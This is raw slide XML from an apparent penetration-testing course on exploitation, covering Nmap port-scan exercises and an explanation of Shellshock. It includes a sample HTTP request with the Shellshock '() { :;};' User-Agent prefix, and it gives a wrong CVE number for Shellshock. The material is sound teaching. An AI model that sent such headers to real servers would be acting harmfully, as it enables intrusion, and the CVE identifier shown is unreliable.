          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="85200C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85200C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2031" name="Google Shape;2031;p103"/>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2" name="Shape 2122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2123" name="Google Shape;2123;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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2124" name="Google Shape;2124;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to scan the top 100 ports of the live hosts you discovered above. Save the results to an XML file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2125" name="Google Shape;2125;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6" name="Google Shape;2126;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7" name="Google Shape;2127;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap --top-ports 100 10.0.0.10 10.0.0.100-101 -oX /tmp/top_ports</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
        <p:nvSpPr>
          <p:cNvPr id="2128" name="Google Shape;2128;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="23535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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to can the top 20 ports of scanme.nmap,orf. Save the results as a normal file.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sp>
        <p:nvSpPr>
          <p:cNvPr id="2133" name="Google Shape;2133;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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2134" name="Google Shape;2134;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to scan the top 100 ports of the live hosts you discovered above. Save the results to an XML file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2135" name="Google Shape;2135;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6" name="Google Shape;2136;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7" name="Google Shape;2137;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap --top-ports 100 10.0.0.10 10.0.0.100-101 -oX /tmp/top_ports</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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2138" name="Google Shape;2138;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="23535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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to can the top 20 ports of scanme.nmap,orf. Save the results as a normal file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2139" name="Google Shape;2139;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263" y="2854300"/>
            <a:ext cx="9144000" cy="1005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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap --top-ports 20 scanme.nmap.org -oN results.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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3" name="Shape 2143"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2144" name="Google Shape;2144;p11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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2145" name="Google Shape;2145;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46" name="Google Shape;2146;p114"/>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7" name="Google Shape;2147;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sp>
        <p:nvSpPr>
          <p:cNvPr id="2152" name="Google Shape;2152;p115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442500" y="1417775"/>
            <a:ext cx="8165400" cy="2667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Introducing Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2154" name="Google Shape;2154;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Shellshock is a critical </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Code Execution (RCE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerability in Bash. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2155" name="Google Shape;2155;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156" name="Google Shape;2156;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57" name="Google Shape;2157;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2626800" y="1711175"/>
            <a:ext cx="6149700" cy="2028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2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shellshock, documented as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2014-6217</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, is critical because it allows attackers to execute arbitrary code on vulnerable servers.</a:t>
            </a:r>
            <a:endParaRPr sz="22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2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Millions of servers were compromised just days after the vulnerability was disclosed. </a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2158" name="Google Shape;2158;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7670300" y="3625475"/>
            <a:ext cx="10296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59" name="Google Shape;2159;p115"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="679875" y="1711175"/>
            <a:ext cx="2099131" cy="202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3" name="Shape 2163"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2164" name="Google Shape;2164;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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2165" name="Google Shape;2165;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Shellshock is made possible due to a vulnerability in how servers parse HTTP requests. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2166" name="Google Shape;2166;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7" name="Google Shape;2167;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8" name="Google Shape;2168;p116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1445425"/>
            <a:ext cx="9144000" cy="3461100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CGI (Common Gateway Interface) defines a standard that allows clients to run scripts on a server. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Typically, when requesting a page like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, the server will load the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and sends it in a response. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>However, with CGI scripts, if a client requests a script capped such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/cgi-bin/status.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, the server will run the script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>status.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and then send its output back in an HTTP response. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sometimes, a server needs to use HTTP headers to run CGI scripts. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For example: if the server is configured to send different responses for clients requesting HTML and clients requiring JSON, it may need to read the Accept header.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Servers that use CGI, automatically load HTTP request headers as Bash environment variables. Then when the servers run CGI scripts, the scripts can access the HTTP headers by reading the environment variables.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2" name="Shape 2172"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2173" name="Google Shape;2173;p117"/>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Bash does not sanitize headers before loading them as environment variables, meaning it will load whatever value is sent in the header. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2174" name="Google Shape;2174;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1450750"/>
            <a:ext cx="6699600" cy="36927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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr>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a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Host: example.com</a:t>
            </a:r>
            <a:endParaRPr>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a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> User-Agent: () { :;};</a:t>
            </a:r>
            <a:endParaRPr>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Connection: keep-alive</a:t>
            </a:r>
            <a:endParaRPr>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None/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For this example, the request below results in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>HTTP_USER_AGENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> being set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(){ :;};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is cryptic syntax, but in vulnerable versions of Bash, it creates a function that does nothing. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2175" name="Google Shape;2175;p117"/>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1200"/>
              <a:t>Creating a function means the server interprets the header as shellcode.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Since it doesn’t just read it as a string, it can execute arbitrary code on the target. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2176" name="Google Shape;2176;p11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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2177" name="Google Shape;2177;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8" name="Google Shape;2178;p11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2" name="Shape 2182"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2183" name="Google Shape;2183;p118"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bash does not sanitize headers before loading them as environment variables, meaning it will load whatever value is sent in the header. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2184" name="Google Shape;2184;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1450750"/>
            <a:ext cx="6699600" cy="36927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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
